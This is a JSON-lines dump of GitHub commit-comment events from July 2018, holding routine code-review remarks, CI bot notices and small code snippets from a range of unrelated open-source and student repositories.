{"id":"7986232444","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29757976,"position":49,"line":74,"path":"app/src/main/java/me/carolwang/parstagram/PostDetailsFragment.java","commit_id":"3c1da00655ace96c60c9a9e1b624735ab1f92ab3","created_at":"2018-07-19T00:50:52Z","updated_at":"2018-07-19T00:50:52Z","author_association":"NONE","body":"You could probably put this logic inside a static method of Post.\r\n\r\n```\r\npublic static Post unwrap(Bundle data) {\r\n  Parcels.unwrap(data.getParcelable(Post.class.getSimpleName()));\r\n}\r\n```\r\n\r\nthen you code here would just be\r\n\r\n`final Post post = Post.unwrap(savedData);`\r\n"}},"created_at":"2018-07-19T00:50:52Z"}
{"id":"7986235218","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29757980,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T00:52:00Z","updated_at":"2018-07-19T00:52:00Z","author_association":"NONE","body":"Congratulations!\r\n\r\nLLR: 2.96 (-2.94,2.94) [0.00,5.00]\r\nTotal: 12135 W: 2171 L: 1997 D: 7967"}},"created_at":"2018-07-19T00:52:00Z"}
{"id":"7986235738","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Omnia-Contentus"},"payload":{"comment":{"id":29757981,"position":50,"line":39,"path":"data/planet.txt","commit_id":"f919c4e7bc506d56eb10da9836d84e4487cbb35c","created_at":"2018-07-19T00:52:13Z","updated_at":"2018-07-19T00:52:13Z","author_association":"NONE","body":"smh no generic names"}},"created_at":"2018-07-19T00:52:13Z"}
{"id":"7986245133","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29758002,"position":4,"line":2,"path":"data/government.txt","commit_id":"0c2f1517ba9e491c4d45f722cfdac545cfc08b53","created_at":"2018-07-19T00:55:57Z","updated_at":"2018-07-19T00:55:57Z","author_association":"NONE","body":"why .1 for player reputation? why not 0 or 1"}},"created_at":"2018-07-19T00:55:57Z"}
{"id":"7986249432","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29758010,"position":null,"line":null,"path":null,"commit_id":"e0e08ea155933b6624a22e580d3dce9a6c62d8ff","created_at":"2018-07-19T00:57:34Z","updated_at":"2018-07-19T00:57:34Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-57](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-57).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-57-tre.pantheonsite.io/)"}},"created_at":"2018-07-19T00:57:34Z"}
{"id":"7986255880","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29758020,"position":7,"line":20,"path":"data/planet.txt","commit_id":"f995d56aaa93083f34c3684cf06532c6cc475cec","created_at":"2018-07-19T01:00:03Z","updated_at":"2018-07-19T01:00:03Z","author_association":"NONE","body":"quite a lot for sucha planet\r\nwhy not small tribute small payment?"}},"created_at":"2018-07-19T01:00:03Z"}
{"id":"7986256435","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29758025,"position":49,"line":49,"path":"lib/node_modules/@stdlib/stats/incr/cv/README.md","commit_id":"6dd7df93fd2c6e40fd0662844acf8b69b887dcec","created_at":"2018-07-19T01:00:13Z","updated_at":"2018-07-19T01:00:13Z","author_association":"MEMBER","body":"Is \"thus\" correct here? Since the CV definition is not a consequence or result of the formulas for mean and standard deviation, I would remove it."}},"created_at":"2018-07-19T01:00:13Z"}
{"id":"7986257043","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29758030,"position":18,"line":186,"path":"data/planet.txt","commit_id":"f995d56aaa93083f34c3684cf06532c6cc475cec","created_at":"2018-07-19T01:00:24Z","updated_at":"2018-07-19T01:00:24Z","author_association":"NONE","body":"less fleet more money smh"}},"created_at":"2018-07-19T01:00:24Z"}
{"id":"7986258622","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29758038,"position":3,"line":3,"path":"data/outfitter.txt","commit_id":"8e8b3e5c93289905886a277ee4a452d5f94d7331","created_at":"2018-07-19T01:00:51Z","updated_at":"2018-07-19T01:00:51Z","author_association":"NONE","body":"smh generic name"}},"created_at":"2018-07-19T01:00:51Z"}
{"id":"7986258717","type":"CommitCommentEvent","actor":{"login":"AndreiYan"},"repo":{"name":"AndreiYan/EnglishPremierLeague"},"payload":{"comment":{"id":29758039,"position":null,"line":null,"path":null,"commit_id":"c2327e29acde277a938cd8a029fa05bece385cec","created_at":"2018-07-19T01:00:53Z","updated_at":"2018-07-19T01:00:53Z","author_association":"OWNER","body":"changes spacing"}},"created_at":"2018-07-19T01:00:53Z"}
{"id":"7986260024","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29758043,"position":28,"line":64,"path":"app/src/main/java/me/carolwang/parstagram/models/Post.java","commit_id":"3c1da00655ace96c60c9a9e1b624735ab1f92ab3","created_at":"2018-07-19T01:01:20Z","updated_at":"2018-07-19T01:01:20Z","author_association":"NONE","body":"What is this `fetch` for?"}},"created_at":"2018-07-19T01:01:20Z"}
{"id":"7986266098","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29758058,"position":null,"line":null,"path":null,"commit_id":"c224b5e175fae704f6fc5740284a8dbf70800f8a","created_at":"2018-07-19T01:03:40Z","updated_at":"2018-07-19T01:03:40Z","author_association":"NONE","body":"split those in 2 sentences because that looks better smh"}},"created_at":"2018-07-19T01:03:40Z"}
{"id":"7986267189","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29758060,"position":10,"line":66,"path":"data/outfit.txt","commit_id":"b6303e2b8293344665a303fa2a84ec3aebf8e25d","created_at":"2018-07-19T01:04:06Z","updated_at":"2018-07-19T01:04:06Z","author_association":"NONE","body":"hmm nvm"}},"created_at":"2018-07-19T01:04:06Z"}
{"id":"7986274652","type":"CommitCommentEvent","actor":{"login":"cassandrakane"},"repo":{"name":"cassandrakane/FBU-Instagram"},"payload":{"comment":{"id":29758074,"position":11,"line":58,"path":"app/src/main/java/com/example/cassandrakane/instagram/ProfileFragment.java","commit_id":"6d43b0c3b155bc13041664c3723795cf70d421ff","created_at":"2018-07-19T01:07:01Z","updated_at":"2018-07-19T01:07:01Z","author_association":"OWNER","body":"It removes boilerplate code for declaring views (instead declaring a view and using findViewById in onCreate, you just @BindView)"}},"created_at":"2018-07-19T01:07:01Z"}
{"id":"7986277046","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29758080,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-19T01:07:54Z","updated_at":"2018-07-19T01:07:54Z","author_association":"MEMBER","body":"deve do you have soccer server started with --type=3 (and --soccer-goals / --soccer-timed)?\r\n\r\nalso i think --ranked is not necessary for soccer mode (and battle later)"}},"created_at":"2018-07-19T01:07:54Z"}
{"id":"7986279089","type":"CommitCommentEvent","actor":{"login":"path1380"},"repo":{"name":"path1380/FEM_Parth"},"payload":{"comment":{"id":29758093,"position":42,"line":269,"path":"src/local_mat.f90","commit_id":"046adf71f5bfed549cf89ba39d101ad8eb6e221d","created_at":"2018-07-19T01:08:39Z","updated_at":"2018-07-19T01:08:39Z","author_association":"OWNER","body":"That's how the Jacobi Preconditioner is defined, right? (Unless I am getting the definition of Jacobi Preconditioner totally wrong)"}},"created_at":"2018-07-19T01:08:39Z"}
{"id":"7986288560","type":"CommitCommentEvent","actor":{"login":"Black-Hole"},"repo":{"name":"SpigotMC/BungeeCord"},"payload":{"comment":{"id":29758125,"position":null,"line":null,"path":null,"commit_id":"76dc32ee3259c9d52ce71467c926c055693f5e92","created_at":"2018-07-19T01:12:19Z","updated_at":"2018-07-19T01:12:19Z","author_association":"CONTRIBUTOR","body":"The Minecraft client supports IPv6 since at least version 1.9"}},"created_at":"2018-07-19T01:12:19Z"}
{"id":"7986289029","type":"CommitCommentEvent","actor":{"login":"Wambosa"},"repo":{"name":"waielal/SPICA"},"payload":{"comment":{"id":29758127,"position":17,"line":17,"path":"SPICA/Formats/Generic/UnityAnim/ANIM.cs","commit_id":"fb64ce2bb5210dd442ffad61bb97dff9ca6d1af3","created_at":"2018-07-19T01:12:31Z","updated_at":"2018-07-19T01:12:31Z","author_association":"NONE","body":"ummm does this work!? [I took a different approach](https://github.com/Wambosa/SPICA/commit/7c40cce2bb93ebf772ab893f8d51361424992751) where i just merged all the animations in a dae export. This would be much more flexible and better if possible to export directly into a format unity can apply these animations generically"}},"created_at":"2018-07-19T01:12:31Z"}
{"id":"7986289193","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29758128,"position":46,"line":19,"path":"app/src/main/java/me/carolwang/parstagram/HomeActivity.java","commit_id":"da8277bf44703cdc4e34cb82393338f2264b6573","created_at":"2018-07-19T01:12:35Z","updated_at":"2018-07-19T01:12:35Z","author_association":"NONE","body":"Would prefer property names like `fragmentHome` rather than `fragment1`."}},"created_at":"2018-07-19T01:12:35Z"}
{"id":"7986291235","type":"CommitCommentEvent","actor":{"login":"jrose-apple"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":29758133,"position":11,"line":15,"path":"Sources/SPMLLBuild/llbuild.swift","commit_id":"58313e46b348dc362b5a4b0c30305d339a17238a","created_at":"2018-07-19T01:13:23Z","updated_at":"2018-07-19T01:13:23Z","author_association":"MEMBER","body":"[This broke the package integration tests](https://ci.swift.org/job/oss-swift-package-linux-ubuntu-16_10/1987/) (and is blocking PR testing). Can you revert for now?"}},"created_at":"2018-07-19T01:13:23Z"}
{"id":"7986292284","type":"CommitCommentEvent","actor":{"login":"msiemczyk"},"repo":{"name":"msiemczyk/cobertura"},"payload":{"comment":{"id":29758135,"position":null,"line":null,"path":null,"commit_id":"8b7f70eadfb41c3a4f1e2161086721300b7319fc","created_at":"2018-07-19T01:13:48Z","updated_at":"2018-07-19T01:13:48Z","author_association":"OWNER","body":"This is also related to\r\n\r\nhttps://github.com/cobertura/cobertura/issues/375"}},"created_at":"2018-07-19T01:13:48Z"}
{"id":"7986293707","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29758137,"position":47,"line":20,"path":"app/src/main/java/me/carolwang/parstagram/HomeActivity.java","commit_id":"da8277bf44703cdc4e34cb82393338f2264b6573","created_at":"2018-07-19T01:14:18Z","updated_at":"2018-07-19T01:14:18Z","author_association":"NONE","body":"You could also have typed these more strongly to avoid casting later:\r\n`final HomeFragment fragHome = new HomeFragment();`"}},"created_at":"2018-07-19T01:14:18Z"}
{"id":"7986295553","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29758143,"position":203,"line":79,"path":"app/src/main/java/me/carolwang/parstagram/HomeActivity.java","commit_id":"da8277bf44703cdc4e34cb82393338f2264b6573","created_at":"2018-07-19T01:15:04Z","updated_at":"2018-07-19T01:15:04Z","author_association":"NONE","body":"See above comment on having more strongly types properties."}},"created_at":"2018-07-19T01:15:04Z"}
{"id":"7986300995","type":"CommitCommentEvent","actor":{"login":"hericst"},"repo":{"name":"hericst/nanodegree001"},"payload":{"comment":{"id":29758155,"position":null,"line":null,"path":null,"commit_id":"f531964330b5c85f5604be2fa0e8acb172dfcb1a","created_at":"2018-07-19T01:17:03Z","updated_at":"2018-07-19T01:17:03Z","author_association":"OWNER","body":"<RelativeLayout xmlns=\"http://schemas.android.com/apk/res/android\"\r\n   xmlns:tools=\"http://schemas.android.com/tools\"\r\n   android:layout_width=\"match_parent\"\r\n   android:layout_height=\"match_parent\"\r\n   tools:context=\".MainActivity\">\r\n\r\n   <ImageView\r\n       android:layout_width=\"match_parent\"\r\n       android:layout_height=\"match_parent\"\r\n       android:scaleType=\"centerCrop\"\r\n       android:src=\"@drawable/telaafter\" />\r\n\r\n   <TextView\r\n       android:layout_width=\"wrap_content\"\r\n       android:layout_height=\"wrap_content\"\r\n       android:fontFamily=\"sans-serif-light\"\r\n       android:padding=\"20dp\"\r\n       android:text=\"Happy Birthday, Ben!\"\r\n       android:textColor=\"@android:color/white\"\r\n       android:textSize=\"36sp\" />\r\n\r\n   <TextView\r\n       android:layout_width=\"wrap_content\"\r\n       android:layout_height=\"wrap_content\"\r\n       android:layout_alignParentBottom=\"true\"\r\n       android:layout_alignParentRight=\"true\"\r\n       android:fontFamily=\"sans-serif-light\"\r\n       android:padding=\"20dp\"\r\n       android:text=\"From, Lyla!\"\r\n       android:textColor=\"@android:color/white\"\r\n       android:textSize=\"36sp\" />\r\n\r\n</RelativeLayout>\r\n"}},"created_at":"2018-07-19T01:17:03Z"}
{"id":"7986302401","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29758163,"position":68,"line":68,"path":"app/src/main/java/me/carolwang/parstagram/PostDetailsFragment.java","commit_id":"da8277bf44703cdc4e34cb82393338f2264b6573","created_at":"2018-07-19T01:17:34Z","updated_at":"2018-07-19T01:17:34Z","author_association":"NONE","body":"Can you remind me what the Glide library does?"}},"created_at":"2018-07-19T01:17:34Z"}
{"id":"7986308291","type":"CommitCommentEvent","actor":{"login":"MacInnes"},"repo":{"name":"MacInnes/sticker_overflow"},"payload":{"comment":{"id":29758180,"position":5,"line":6,"path":"app/views/stickers/show.html.erb","commit_id":"03da17ca540699cd6f52dc43ee1872d1bbe07d4d","created_at":"2018-07-19T01:19:52Z","updated_at":"2018-07-19T01:19:52Z","author_association":"OWNER","body":"@dionew1 here's where I think the error is occurring...  it's passing my spec (I'll tag that line as well) but not working when I use it"}},"created_at":"2018-07-19T01:19:52Z"}
{"id":"7986309746","type":"CommitCommentEvent","actor":{"login":"MacInnes"},"repo":{"name":"MacInnes/sticker_overflow"},"payload":{"comment":{"id":29758182,"position":8,"line":43,"path":"spec/features/user_visits_a_sticker_page_spec.rb","commit_id":"03da17ca540699cd6f52dc43ee1872d1bbe07d4d","created_at":"2018-07-19T01:20:24Z","updated_at":"2018-07-19T01:20:24Z","author_association":"OWNER","body":"@dionew1 this works..."}},"created_at":"2018-07-19T01:20:24Z"}
{"id":"7986312077","type":"CommitCommentEvent","actor":{"login":"nterbogt"},"repo":{"name":"fclimited/fcl-site-cievents"},"payload":{"comment":{"id":29758188,"position":null,"line":null,"path":null,"commit_id":"36801530ec62517fa4a8d191d3f86f4cefdcdb3f","created_at":"2018-07-19T01:21:20Z","updated_at":"2018-07-19T01:21:20Z","author_association":"COLLABORATOR","body":"Created multidev environment [fcl-site-cievents#ci-1](https://dashboard.pantheon.io/sites/822dad82-e3c1-4a75-9aec-58b9de9123e7#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-fcl-site-cievents.pantheonsite.io/)"}},"created_at":"2018-07-19T01:21:20Z"}
{"id":"7986312386","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":29758189,"position":11,"line":15,"path":"Sources/SPMLLBuild/llbuild.swift","commit_id":"58313e46b348dc362b5a4b0c30305d339a17238a","created_at":"2018-07-19T01:21:26Z","updated_at":"2018-07-19T01:21:26Z","author_association":"MEMBER","body":"I'll disable that test instead"}},"created_at":"2018-07-19T01:21:26Z"}
{"id":"7986314009","type":"CommitCommentEvent","actor":{"login":"spyhunter99"},"repo":{"name":"osmdroid/osmdroid"},"payload":{"comment":{"id":29758193,"position":6,"line":11,"path":".travis.yml","commit_id":"62a7a2698afaad1469f7cb4d27b75a5f03bd74cc","created_at":"2018-07-19T01:22:07Z","updated_at":"2018-07-19T01:22:07Z","author_association":"COLLABORATOR","body":"hmm we can try it i guess. FYI i found a working api24 config, may be we can borrow it\r\nhttps://github.com/andstatus/andstatus/blob/master/.travis.yml"}},"created_at":"2018-07-19T01:22:07Z"}
{"id":"7986314325","type":"CommitCommentEvent","actor":{"login":"cdmask"},"repo":{"name":"cdmask/vf-pmsm"},"payload":{"comment":{"id":29758194,"position":32,"line":32,"path":"Replicate Chandana stability.m","commit_id":"b8498c805b1ac371aa8376162c22ccdf5c07a4e8","created_at":"2018-07-19T01:22:12Z","updated_at":"2018-07-19T01:22:12Z","author_association":"OWNER","body":"I made a mistake before. This speed should always be synchronous speed, as we develop the model based on a machine of one pole pair."}},"created_at":"2018-07-19T01:22:12Z"}
{"id":"7986318308","type":"CommitCommentEvent","actor":{"login":"GrantErickson"},"repo":{"name":"IntelliTect/Coalesce"},"payload":{"comment":{"id":29758204,"position":null,"line":null,"path":null,"commit_id":"d6c01ec7acb179f87854d4ee6f8e45dfc767595f","created_at":"2018-07-19T01:23:48Z","updated_at":"2018-07-19T01:23:48Z","author_association":"COLLABORATOR","body":"Great job Kelly!"}},"created_at":"2018-07-19T01:23:48Z"}
{"id":"7986318476","type":"CommitCommentEvent","actor":{"login":"Nitimar"},"repo":{"name":"paypal/NNAnalytics"},"payload":{"comment":{"id":29758205,"position":165,"line":234,"path":"src/main/java/com/paypal/namenode/NNAnalyticsRestAPI.java","commit_id":"1e60c6a3232bc8ce59fd0cca5a8daf5fb82c3c27","created_at":"2018-07-19T01:23:52Z","updated_at":"2018-07-19T01:23:52Z","author_association":"NONE","body":"\r\n@@ -49,6 +49,7 @@\r\n import java.util.LinkedList;\r\n import java.util.List;\r\n import java.util.Map;\r\n+import java.util.Map.Entry;\r\n import java.util.Set;\r\n import java.util.concurrent.Callable;\r\n import java.util.concurrent.ExecutorService;\r\n@@ -63,6 +64,16 @@\r\n import org.apache.hadoop.hdfs.server.namenode.INode;\r\n import org.apache.hadoop.hdfs.server.namenode.INodeWithAdditionalFields;\r\n import org.apache.hadoop.hdfs.server.namenode.NNAConstants;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.ENDPOINT;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.FILTER;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.FILTER_OP;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.FIND;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.HISTOGRAM;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.HISTOGRAM_OUTPUT;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.OPERATION;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.SET;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.SUM;\r\n+import org.apache.hadoop.hdfs.server.namenode.NNAConstants.TRANSFORM;"}},"created_at":"2018-07-19T01:23:52Z"}
{"id":"7986318589","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":29758206,"position":11,"line":15,"path":"Sources/SPMLLBuild/llbuild.swift","commit_id":"58313e46b348dc362b5a4b0c30305d339a17238a","created_at":"2018-07-19T01:23:54Z","updated_at":"2018-07-19T01:23:54Z","author_association":"MEMBER","body":"Done: https://github.com/apple/swift-integration-tests/commit/e882c92e1f063f5971f11c4163414fd75356f521"}},"created_at":"2018-07-19T01:23:54Z"}
{"id":"7986333187","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29758230,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-19T01:29:37Z","updated_at":"2018-07-19T01:29:37Z","author_association":"CONTRIBUTOR","body":"grepping for LAFACT in the source files, I did not find any usage where it looked like it needed to be declared as a manifest constant.  It should be simple to change it to a variable that is set to 1000 as the default value and when using the Heirloom letter adjust mode (.letcalc 0), and 10000 for the others.  That would eliminate any possibility of reflow due to resolution differences.\n\nI compared the merged n-t-roff with typotests last weekend, using the older version of the user's manual I had modified to incorporate the typotest features, and the ditroff files were identical except for the default font paths.  The modifications use most of the typo features, although not all of the variations, but there were no apparent issues with things that did not work after the merge.  I have not done a more thorough check, though.\n\nThe documents are in the reffort/typo-tests-documents repo.  There are some minor updates, mostly clarified wording, that need to be pushed when that becomes possible again.  The modified source for Gunnar's Troff Demo Page is workable, but the user's manual is an out-of-date version.  The source for the typo document is not useful in its present form:  The document cannot be built from it without the corresponding macros (which are not forthcoming anytime soon), so it needs to be converted to a standard macro package or to a standalone document.\n\nThe Github problem appears to be related to the changed \"privacy\" policy settings that are incompatible with pushing updates.  The help page shows something that might be a workaround, though.\n\nUnfortunately, after the normal push process did not work, I uploaded the changed files through the web interface, and the one-line fix for the overrun penalty problem was diff'd as the entire n7.c file.  Now I will have to ask them to completely revert that, or just delete the repo and re-fork it, unless (hopefully) there is a better method."}},"created_at":"2018-07-19T01:29:37Z"}
{"id":"7986333917","type":"CommitCommentEvent","actor":{"login":"verbuggt"},"repo":{"name":"verbuggt/AwesomeStats-API"},"payload":{"comment":{"id":29758233,"position":6,"line":6,"path":"Spigot - Stats API/src/plugin.yml","commit_id":"1a05665930f48c4407c4d332e642bf91bd80678f","created_at":"2018-07-19T01:29:52Z","updated_at":"2018-07-19T01:29:52Z","author_association":"OWNER","body":"bruh, messed up the version here....\r\n"}},"created_at":"2018-07-19T01:29:52Z"}
{"id":"7986335916","type":"CommitCommentEvent","actor":{"login":"t1meshift"},"repo":{"name":"DwarfMason/Dragon-Shore"},"payload":{"comment":{"id":29758241,"position":139,"line":232,"path":"engine.js","commit_id":"71343d10242447719890dcc1d0d4c74becf41070","created_at":"2018-07-19T01:30:36Z","updated_at":"2018-07-19T01:30:36Z","author_association":"COLLABORATOR","body":"мог бы сам ручками переписывать, в принципе"}},"created_at":"2018-07-19T01:30:36Z"}
{"id":"7986338741","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29758245,"position":49,"line":49,"path":"lib/node_modules/@stdlib/stats/incr/mcv/README.md","commit_id":"eed6b690d7c37249b04544b3f5fd36ad8eb3187f","created_at":"2018-07-19T01:31:39Z","updated_at":"2018-07-19T01:31:39Z","author_association":"MEMBER","body":"Is \"thus\" correct here? Since the CV definition is not a consequence or result of the formulas for mean and standard deviation, I would remove it."}},"created_at":"2018-07-19T01:31:39Z"}
{"id":"7986339086","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29758246,"position":null,"line":null,"path":null,"commit_id":"e58e9b6f72a8c6f98e1be0e808f170f2488ff929","created_at":"2018-07-19T01:31:47Z","updated_at":"2018-07-19T01:31:47Z","author_association":"COLLABORATOR","body":"Si, por eso arrobié a Rama.\r\n\r\nPD: Segun esto no hay que usar mas eso. Habria que sacarlo.\r\nhttps://dzone.com/articles/how-does-spring-transactional\r\nParece que al programador de hoy día le gusta  escribir poco código y relajarse en la magia de los frameworks. Antes era mas clara la programación. \r\n/sacrasm_on\r\nVeo que el día de mañana van a crear un framework que sea. @Do @Web @Application.about=RESTAURANT y listo.. no vamos a tener que tocar ni 1 linea... /sarcasm_off"}},"created_at":"2018-07-19T01:31:47Z"}
{"id":"7986340018","type":"CommitCommentEvent","actor":{"login":"garyd203"},"repo":{"name":"MechanicalRock/serverless-sns-filter"},"payload":{"comment":{"id":29758247,"position":null,"line":null,"path":null,"commit_id":"6ca799f9cd4947e3c3eda8cb22fe73bf856623cd","created_at":"2018-07-19T01:32:08Z","updated_at":"2018-07-19T01:32:08Z","author_association":"CONTRIBUTOR","body":"Thanks for fixing up those tests, I didn't know where to start."}},"created_at":"2018-07-19T01:32:08Z"}
{"id":"7986341735","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758249,"position":11,"line":11,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T01:32:47Z","updated_at":"2018-07-19T01:32:47Z","author_association":"MEMBER","body":"should not be using firebase for something on a scale like this"}},"created_at":"2018-07-19T01:32:47Z"}
{"id":"7986341812","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29758250,"position":null,"line":null,"path":null,"commit_id":"2d1352d9897d84a97d737a2581f4cae47a53a9b2","created_at":"2018-07-19T01:32:49Z","updated_at":"2018-07-19T01:32:49Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2985 tests passed, 627 test warnings)\n\nMessages:\n\n * 627 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-19T01:32:49Z"}
{"id":"7986342325","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758251,"position":16,"line":16,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T01:33:03Z","updated_at":"2018-07-19T01:33:03Z","author_association":"MEMBER","body":"don't ask for details like these either"}},"created_at":"2018-07-19T01:33:03Z"}
{"id":"7986344873","type":"CommitCommentEvent","actor":{"login":"t1meshift"},"repo":{"name":"DwarfMason/Dragon-Shore"},"payload":{"comment":{"id":29758259,"position":131,"line":274,"path":"engine.js","commit_id":"71343d10242447719890dcc1d0d4c74becf41070","created_at":"2018-07-19T01:34:01Z","updated_at":"2018-07-19T01:34:01Z","author_association":"COLLABORATOR","body":"Чота в гiлос с первого аргумента, ты в курсе, что отрисовкой занимается `update()`, который _во время вызова_ знает про контекст канваса?"}},"created_at":"2018-07-19T01:34:01Z"}
{"id":"7986346254","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758262,"position":35,"line":35,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T01:34:32Z","updated_at":"2018-07-19T01:34:32Z","author_association":"MEMBER","body":"bad practice to use if else as well as startswith with something like this. i can easily just do \"!pinggrouplkasdjf;aksldfjas;ldkfj\" and it works."}},"created_at":"2018-07-19T01:34:32Z"}
{"id":"7986346611","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758263,"position":35,"line":35,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T01:34:41Z","updated_at":"2018-07-19T01:34:41Z","author_association":"MEMBER","body":"use a command framework\r\n"}},"created_at":"2018-07-19T01:34:41Z"}
{"id":"7986347155","type":"CommitCommentEvent","actor":{"login":"t1meshift"},"repo":{"name":"DwarfMason/Dragon-Shore"},"payload":{"comment":{"id":29758265,"position":56,"line":85,"path":"engine.js","commit_id":"71343d10242447719890dcc1d0d4c74becf41070","created_at":"2018-07-19T01:34:55Z","updated_at":"2018-07-19T01:34:55Z","author_association":"COLLABORATOR","body":"Хороший рефактор, и код интересный"}},"created_at":"2018-07-19T01:34:55Z"}
{"id":"7986348670","type":"CommitCommentEvent","actor":{"login":"vokins"},"repo":{"name":"vokins/yhosts"},"payload":{"comment":{"id":29758268,"position":null,"line":null,"path":null,"commit_id":"611bf32f1b17c408ec1da931e5c3b5f91f381ae5","created_at":"2018-07-19T01:35:24Z","updated_at":"2018-07-19T01:35:24Z","author_association":"OWNER","body":"感谢反馈，已修复。"}},"created_at":"2018-07-19T01:35:24Z"}
{"id":"7986348774","type":"CommitCommentEvent","actor":{"login":"dhmoeller"},"repo":{"name":"FiendsOfTheElements/FF1Randomizer"},"payload":{"comment":{"id":29758269,"position":null,"line":null,"path":null,"commit_id":"0124ddf2ae2168f32e9e9a612fec78b89fe3fbe8","created_at":"2018-07-19T01:35:26Z","updated_at":"2018-07-19T01:35:26Z","author_association":"CONTRIBUTOR","body":"Looks good. \r\n\r\nZip is a little fancy for my taste at the end of a high complexity method, but it’s not “wrong”."}},"created_at":"2018-07-19T01:35:26Z"}
